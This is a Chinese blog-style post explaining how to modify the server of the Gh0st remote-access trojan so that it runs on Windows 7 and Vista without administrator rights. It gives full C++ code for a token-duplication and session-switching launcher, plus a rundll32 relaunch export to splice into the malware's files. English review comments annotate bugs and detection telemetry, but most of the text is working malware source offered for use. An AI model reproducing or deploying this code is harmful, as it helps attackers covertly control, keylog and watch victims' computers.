以前的老文章了,做下记录吧,这两天帮朋友改一个Gh0st,在测试Win7功能的时候发现以前网上公布的方法不是很好兼容,虽然屏幕和键盘记录可以用,但是上线速度很慢,而且服务端不会自删除.更重要的是还得用管理员模式才能运行,反复找资料和测试.终于解决了Gh0st完美兼容Win7和Vista的问题,双击就可以运行,我尽量把笔记写的详细些.如果还有朋友不懂的话在这里留言,我看到会尽量帮大家解决.
打开server的until.cpp文件.在最后面#endif的上面加上下列代码
// Starts lpCommand as a new process inside the active console session.
// How it gets there: the caller's own primary token (OpenProcessToken on
// GetCurrentProcess) is duplicated with DuplicateTokenEx, the copy's
// TokenSessionId is rewritten to the console session id, SeDebugPrivilege is
// enabled on the copy, and CreateProcessAsUser is called with that copy.
// The token obtained from WTSQueryUserToken (hUserToken) is never used for the
// launch — it is only closed at the end — so the child keeps the caller's
// identity rather than the logged-on user's.
// Returns 0 on success, otherwise the GetLastError() value of the first failing
// call. The early LoadLibrary failure returns FALSE, which is also 0, so a zero
// return does not by itself prove the process was created.
// NOTE(review): for monitoring purposes, a process appearing in the console
// session via CreateProcessAsUser, with SeDebugPrivilege adjusted on the token
// and the creator presumably running in another session, is a high-signal
// combination for process-creation / token telemetry.
DWORD _stdcall LaunchAppIntoDifferentSession( LPTSTR lpCommand )
{
    DWORD dwRet = 0;
    PROCESS_INFORMATION pi;
    STARTUPINFO si;
    DWORD dwSessionId;
    HANDLE hUserToken = NULL;
    HANDLE hUserTokenDup = NULL;
    HANDLE hPToken = NULL;
    HANDLE hProcess = NULL;          // declared but never used below
    DWORD dwCreationFlags;
    HMODULE hInstKernel32 = NULL;
    // WTSGetActiveConsoleSessionId is resolved at run time rather than linked.
    typedef DWORD (WINAPI *WTSGetActiveConsoleSessionIdPROC)();
    WTSGetActiveConsoleSessionIdPROC WTSGetActiveConsoleSessionId = NULL;
    hInstKernel32 = LoadLibrary("Kernel32.dll");
    if (!hInstKernel32)
    {
        return FALSE;
    }
    // The GetProcAddress result is not NULL-checked before the call below.
    WTSGetActiveConsoleSessionId = (WTSGetActiveConsoleSessionIdPROC)GetProcAddress(hInstKernel32,"WTSGetActiveConsoleSessionId");
    // Log the client on to the local computer.
    dwSessionId = WTSGetActiveConsoleSessionId();
    do
    {
        // Return value is not checked, and hUserToken is not used after this
        // point except to be closed.
        WTSQueryUserToken( dwSessionId,&hUserToken );
        dwCreationFlags = NORMAL_PRIORITY_CLASS | CREATE_NEW_CONSOLE;
        ZeroMemory( &si, sizeof( STARTUPINFO ) );
        si.cb= sizeof( STARTUPINFO );
        si.lpDesktop = "winsta0default";
        ZeroMemory( &pi, sizeof(pi) );
        TOKEN_PRIVILEGES tp;
        LUID luid;
        // The token being duplicated is the current process's own token.
        if( !::OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY | TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_ADJUST_SESSIONID | TOKEN_READ | TOKEN_WRITE, &hPToken ) )
        {
            dwRet = GetLastError();
            break;
        }
        else;
        if ( !LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &luid ) )
        {
            dwRet = GetLastError();
            break;
        }
        else;
        // Single privilege to enable on the duplicated token: SeDebugPrivilege.
        tp.PrivilegeCount =1;
        tp.Privileges[0].Luid =luid;
        tp.Privileges[0].Attributes =SE_PRIVILEGE_ENABLED;
        if( !DuplicateTokenEx( hPToken, MAXIMUM_ALLOWED, NULL, SecurityIdentification, TokenPrimary, &hUserTokenDup ) )
        {
            dwRet = GetLastError();
            break;
        }
        else;
        //Adjust Token privilege
        // Retarget the duplicated token at the console session.
        if( !SetTokenInformation( hUserTokenDup,TokenSessionId,(void*)&dwSessionId,sizeof(DWORD) ) )
        {
            dwRet = GetLastError();
            break;
        }
        else;
        if( !AdjustTokenPrivileges( hUserTokenDup, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, NULL ) )
        {
            dwRet = GetLastError();
            break;
        }
        else;
        // Optional environment block for the child, resolved from UserEnv.dll
        // at run time; the LoadLibrary handle here is never released.
        LPVOID pEnv =NULL;
        DWORD (__stdcall *CreateEnvironmentBlock)( LPVOID *, HANDLE, BOOL );
        CreateEnvironmentBlock = (DWORD (__stdcall *)(LPVOID *, HANDLE,BOOL))GetProcAddress( LoadLibrary("UserEnv.dll"), "CreateEnvironmentBlock" );
        if (!CreateEnvironmentBlock) break;
        if( CreateEnvironmentBlock( &pEnv, hUserTokenDup, TRUE ) )
        {
            dwCreationFlags|=CREATE_UNICODE_ENVIRONMENT;
        }
        else pEnv=NULL;
        // Launch the process in the client's logon session.
        if( CreateProcessAsUser( hUserTokenDup, // client's access token
            NULL, // file to execute
            lpCommand, // command line
            NULL, // pointer to process SECURITY_ATTRIBUTES
            NULL, // pointer to thread SECURITY_ATTRIBUTES
            FALSE, // handles are not inheritable
            dwCreationFlags,// creation flags
            pEnv, // pointer to new environment block
            NULL, // name of current directory
            &si, // pointer to STARTUPINFO structure
            &pi // receives information about new process
            ) )
        {
            // Success path is empty: pi.hProcess / pi.hThread are never closed.
        }
        else
        {
            dwRet = GetLastError();
            break;
        }
    } while( 0 );
    //Perform All the Close Handles task
    if( NULL != hUserToken )
    {
        CloseHandle( hUserToken );
    }
    else;
    if( NULL != hUserTokenDup)
    {
        CloseHandle( hUserTokenDup );
    }
    else;
    if( NULL != hPToken )
    {
        CloseHandle( hPToken );
    }
    else;
    return dwRet;
}
然后打开until.h 同样在最后面的#endif上面加上
// Prototype for the helper the post adds to until.cpp; see that definition for
// the token/session handling and the meaning of the DWORD return value.
DWORD _stdcall LaunchAppIntoDifferentSession( LPTSTR lpCommand );
然后打开svchost.cpp
搜索
extern "C" __declspec(dllexport) void ServiceMain( int argc, wchar_t* argv[] )
在上面加上
// Entry point with the rundll32 callback signature (HWND, HINSTANCE, LPTSTR, int).
// The command line built in this file is "rundll32.exe <module path>, XiaoDeBu <svcname>",
// so lpCmdLine carries the service name and is handed straight to main();
// hwnd, hinst and nCmdShow are unused.
// NOTE(review): because the export is referenced by name on the rundll32 command
// line, both the export table entry and the child's full command line are plain
// artifacts for static inspection and process-creation logging.
extern "C" __declspec(dllexport) void XiaoDeBu(HWND hwnd, HINSTANCE hinst, LPTSTR lpCmdLine, int nCmdShow ) { main(lpCmdLine); }
搜索
// Looks up the service type for svcname (presumably from the registry, per the
// helper's name; its definition is not shown here).
g_dwServiceType = QueryServiceTypeFromRegedit(svcname);
在下面加上
// OS version switch: on major version < 6 (pre-Vista) main() keeps running on
// an in-process thread; on 6 and later the module re-launches itself through
// rundll32.exe into the console session via LaunchAppIntoDifferentSession.
HANDLE hThread = NULL;
OSVERSIONINFO OsVerInfoEx;
OsVerInfoEx.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
GetVersionEx(&OsVerInfoEx);
if ( OsVerInfoEx.dwMajorVersion < 6 )// decide which OS this is: below 6, use the original code directly
{
    // This inner hThread shadows the outer one declared above, which stays NULL.
    HANDLE hThread = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)main, (LPVOID)svcname, 0, NULL);
}
else
{
    CHAR lpCommand[256];
    CHAR Start[MAX_PATH];
    // Full path of this module (via CKeyboardManager::g_hInstance) becomes the
    // DLL argument on the rundll32 command line.
    GetModuleFileName(CKeyboardManager::g_hInstance,Start,sizeof(Start));
    // Resulting command line: "rundll32.exe <module path>, XiaoDeBu <svcname>".
    // NOTE(review): the module path and export name appear verbatim in the child's
    // command line, which process-creation telemetry can match on directly.
    wsprintf(lpCommand,"rundll32.exe %s, XiaoDeBu %s",Start, svcname );
    LaunchAppIntoDifferentSession(lpCommand);
}
然后把
// Original unconditional in-process launch of main(). The post says to comment
// this line out once the version switch is in place; leaving it would
// presumably start main() a second time on pre-Vista systems.
HANDLE hThread = MyCreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)main, (LPVOID)svcname, 0, NULL);
这句注释掉.